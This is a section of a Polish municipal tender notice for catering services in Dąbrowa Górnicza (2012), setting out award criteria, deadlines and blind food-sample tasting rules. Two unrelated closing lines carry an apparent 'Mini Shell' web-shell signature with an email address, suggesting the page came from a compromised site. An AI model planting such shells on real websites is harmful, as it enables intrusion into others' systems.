<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość świadczenia usług cateringowych - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej  umowy  w  stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie zmiany obowiązujących przepisów prawa istotnych dla postanowień zawartej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa.gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza,
ul. Graniczna 21 
Wydział Promocji, Kultury i Sportu, III pietro, pok. 897.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 11:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 2. Termin wykonania zamówienia publicznego. Termin zakończenia zamówienia: do dnia 31.12.2012r. lub do wyczerpania środków budżetowych do wysokości których będzie podpisana umowa. 3.Próbki oferowanych potraw
 Wykonawca biorący udział w postępowaniu winien przygotować do degustacji następujące próbki potraw:
1. Boeuf Strogonow - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ 
2. Pierś z kurczaka nadziewana szpinakiem w sosie śmietanowym, warzywa z wody, ryż na sypko- 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ 
3. Zupa krem brokułowa - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ 
4. Pierogi z kapustą i grzybami - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ
Próbki potraw należy dostarczyć w dniu otwarcia ofert na Salę Narad nr 2 (I piętro) w Urzędzie Miejskim w godzinach od 11:00 do 11:30. Wykonawcom przed wejściem na salę zostaną przyporządkowane numery. Numeracja próbek jest niezależna od numeracji ofert. Każdy z wykonawców otrzyma dwie kartki z numerem rzymskim, jedną z nich należy oznakować próbkę, drugą należy zachować do czasu identyfikacji próbek, która odbędzie się bezpośrednio przed otwarciem ofert. Każdy z Wykonawców będzie miał możliwość wyeksponowania we wskazanym miejscu potraw stanowiących próbki. Potrawy należy podać na zastawie Wykonawcy. Zastawa użyta do podania potraw nie powinna sugerować nazwy Wykonawcy. Wykonawca winien do godziny 11:30 pozostawić potrawy na wyznaczonym miejscu i oznaczyć je numerem. Ponieważ próbki składane do postępowania podlegają ocenie w ramach kryterium oceny ofert: Jakość świadczenia usług cateringowych, nie ma możliwości uzupełnienia próbek w terminie późniejszym na podstawie art. 26 ust. 3 Ustawy, gdyż naruszałoby to sformułowaną w art. 7 Ustawy zasadę równego traktowania i uczciwej konkurencji.
W godz. od 11:30 do 12:15 Komisja dokona oceny próbek zgodnie z zasadami określonymi w pkt. 24.2.2.1. SIWZ. Przyporządkowanie numerów nie będzie znane Komisji w momencie dokonywania oceny próbek. Próbki potraw zostaną przez Zamawiającego sfotografowane w celach dokumentacyjnych. Po dokonaniu oceny próbek przez komisję, Wykonawcy będą mogli zabrać zastawę oraz pozostałe przedmioty, które zostały wykorzystane do przygotowania i podania potraw.
Przed otwarciem ofert, o godzinie 12:45 odbędzie się na Sali Narad nr 2 spotkanie z Wykonawcami, którzy dostarczyli próbki. Wykonawcy zostaną poinformowani o łącznej punktacji przyznanej oznaczonym numerami rzymskimi próbkom potraw. Po ogłoszeniu punktacji zostanie dokonana identyfikacja próbek polegająca na okazaniu przez Wykonawców numerów próbek wręczonych im w momencie wniesienia próbki na Salę Narad nr 2,  a następnie o  godzinie 13:00 zostanie dokonane otwarcie ofert zgodnie z zasadami określonymi w  pkt. 20 SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com